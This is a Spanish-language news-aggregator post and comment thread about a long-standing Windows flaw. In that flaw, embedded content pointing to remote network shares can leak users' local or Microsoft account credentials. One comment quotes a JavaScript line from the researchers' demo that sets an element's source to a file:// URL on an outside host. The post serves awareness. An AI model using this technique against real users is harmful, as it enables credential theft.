Tecnología, Internet y juegos
22 meneos
108 clics

Una vulnerabilidad en windows permite robar tus credenciales de cuenta Microsoft o local [ENG]

Un bug activo desde win 95 a win 10 permite robar las credenciales de usuario local de windows o en su lugar, también la cuenta de Microsoft. Microsoft Edge, Outlook y otros productos de Microsoft permiten conexiones a recursos compartidos de red locales. El problema viene de que por defecto no se impide además, conexiones a recursos compartidos remotos. Un atacante podría aprovecharse mediante una web o correo con una imagen incrustada u otro contenido que se intenta cargar desde un recurso compartido de red, para poder robar las credenciales

| etiquetas: windows , bug , microsoft , robo credenciales
18 4 1 K 55
10 comentarios
18 4 1 K 55
  1. #1 --11417-- *
    #0 no problem, yo no tengo "crecenciales" que perder ;)
    1 K 21
  2. #2 Marx *
    #1 Las crecenciales son credenciales que crecen, si es que...

    Gracias por el aviso.

    P.D: Demo: msleak.perfect-privacy.com
    1 K 21
  3. janatxan #3 janatxan
    A lo mejor no lo entiendo bien, pero, no se supone que el intento de conexión a un medio de red compartido mediante un objeto incrustado no debería tener un objetivo localizado en la red? O cargan en el mail/web infinidad de posibilidades del monto de las mas habituales? Lo pregunto porque en la oficina un nas tiene unas credenciales concretas y solo se invocan cuando se intenta acceder al medio en cuestion, a traves de su dirección en red, ip, etc etc.
    0 K 7
  4. Nova6K0 #4 Nova6K0
    Una web que te dice que sólo funciona con IE/Edge, no gracias.

    Salu2
    0 K 10
  5. #5 Marx
    #4 Hombre, porque es un bug que no afecta a los demas navegadores
    1 K 18
  6. kalimochero #6 kalimochero
    Quien tiene cuenta de Mocosoft?
    0 K 11
  7. Nova6K0 #7 Nova6K0
    #5 Entonces no es una vulnerabilidad de Windows en sí sino de los navegadores de Windows que son de Microsoft, ya que si usas otros no tienes el problema.

    Salu2
    0 K 10
  8. Nova6K0 #8 Nova6K0
    #6 Pués cualquiera que use la tienda de Windows (Windows App Store), porque no te permite usar otra.

    Salu2
    0 K 10
  9. #9 Razhan
    Basicamente lo que hacen es poner referencia a un elemento con file://. Sacado de su web:
    elem.setAttribute("src","file://msleak.perfect-privacy.com/"+id);

    Esto es viejo, quiero decir, muy muy viejo. Del estilo que se sabe desde hace una eternidad, pero si que es cierto lo que dicen, tu password local de maquina podía no ser tan interesante, pero si es la de tu cuenta de outlook.com, entonces si que lo es.
    1 K 17
  10. #10 sechole
    #7 El problema no solo son los navegadores de Microsoft, sino todos los productos de microsoft: Office, Outlook, etc.
    La prueba de concepto es mas fácil de hacer con una pagina web.
    1 K 20
comentarios cerrados

menéame